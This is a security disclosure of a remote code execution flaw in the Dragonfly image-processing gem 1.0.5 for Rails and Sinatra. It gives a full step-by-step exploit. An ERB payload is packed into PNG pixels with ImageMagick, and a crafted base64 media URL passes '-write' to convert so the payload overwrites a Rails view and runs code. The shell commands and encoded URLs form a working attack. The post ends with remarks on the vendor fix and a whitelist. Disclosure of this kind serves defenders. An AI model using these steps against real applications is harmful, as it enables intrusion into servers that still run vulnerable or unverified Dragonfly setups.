Dragonfly 1.0.5 Remote Code Execution

`RCE in the Dragonfly gem for image uploading & processing in  
rails/sinatra, in version 1.0.5. (https://github.com/markevans/dragonfly)  
  
The underlaying vulnerability is that you can pass arbitrary commands to  
imagemagicks convert, thus granting arbitrary read/write for the  
filesystem. Additionally the -process flag seems to be able to load  
custom modules, which might result in execution of arbitrary files.  
  
Here is a description of _one_ way of how to abuse the RCE vulnerability:  
$cat exploit.rb  
<%= puts "I got ownd" %>  
<% require 'pry' %>  
<% binding.pry %>  
$wc exploit.rb  
3 13 63 exploit.rb  
char length needs to be multiple of 3 (21x3 = 63) because every pixel in  
a png  
will contain 1 byte  
$ convert -size "21x1" -depth 8 rgb:exploit.rb exploit.png  
test that everything went well:  
$convert exploit.png test.rgb  
diff should not show any diffs:  
$diff -v test.rgb exploit.rb  
upload the picture  
copy the image url  
eg:  
http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0  
open pry or irb and run:  
Base64.decode64  
"W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0"  
=>  
"[[\"f\",\"2014/08/10/7i7j215lhg_exploit.png\"],[\"p\",\"thumb\",\"400x200#\"]]"  
Base64.strict_encode64  
[[\"f\",\"2014/08/10/7i7j215lhg_exploit.png\"],[\"p\",\"convert\",\"-write  
rgb:/path/to/rails/app/views/photos/index.html.erb\"]]"  
=>  
"W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0="  
go to your browser and request:  
http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0=  
and then: http://domain.tld/photos/  
which will open app/views/photos/index.html.erb and spawn a pry on the  
terminal  
you called rails server from.  
Of course you can use different imagemagick flags than "write" to  
achieve the same code execution. So this would really call for a  
whitelist that restricts the commands that can be send to imagemagick.  
  
The author was contacted and committed "fixes" (dragonfly version 1.0.6,  
https://github.com/markevans/dragonfly/commit/e88afeceb036fe4d44f7c7787c7e988e1350c2dc#diff-d41d8cd98f00b204e9800998ecf8427e).  
The main fix seems to be "'rename dos_prevention' to 'verify urls  
(recommended)'". Needless to say, many websites out there will still  
disable the verification for ease of deployment of e.g. javascript that  
requests thumbnail versions of images. Note that this vulnerability is  
still exploitable if the attacker is unable to upload images, by using  
the generators to "draw" arbitrary images by imagemagick commands.  
  
cheers,  
coco & leex  
http://hexgolems.com/fd/dragonfly.txt  
  
  
`